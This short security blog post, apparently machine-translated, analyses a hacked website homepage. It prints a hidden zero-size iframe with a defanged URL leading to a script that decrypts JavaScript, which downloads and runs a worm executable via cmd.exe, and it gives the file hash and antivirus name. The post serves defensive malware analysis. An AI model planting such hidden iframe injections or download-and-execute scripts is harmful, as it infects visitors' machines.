EndurerOriginal
1Version
This website homepage containsCode:
<IFRAME src = hxxp: // www *** 1.8 *** 93 *** 8 * 2.cn/5***1*.htm width = 0 Height = 0>
Hxxp: // www *** 1.8 *** 93 *** 8 ** 2.cn/5*%1%%%.htmCode included:
/---
<SCRIPT src = CSS. js> </SCRIPT>
---/
Hxxp: // www *** 1.8 *** 93 *** 8 ** 2.cn/css.jsContent is JavascriptProgram, Use a regular expression to decrypt the code and run it.
The decrypted code is written in Javascript. The function is to use Microsoft. XMLHTTP and
SCR uninstall pting. FileSystemObject download file down.exe, save as % WINDIR % /~ TMP. tmp and run the command % WINDIR %/system32/cmd.exe/C % WINDIR %/~ using the ShellExecute method of the shell. Application Object Q /~ TMP. tmp to run.
/---
File Description: D:/test/down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 20:22:38
Modification time: 20:23:51
Access time: 20:25:16
Size: 65427 bytes, 63.915 KB
MD5: f066f58f878be37bcc53a096d61d05e8
---/
Kaspersky reportsWorm. win32.viking. If.
Postscript:
This kind of Web code encryption technology was first encountered. It took a while to decrypt the code.
The use of cmd.exe is also novel.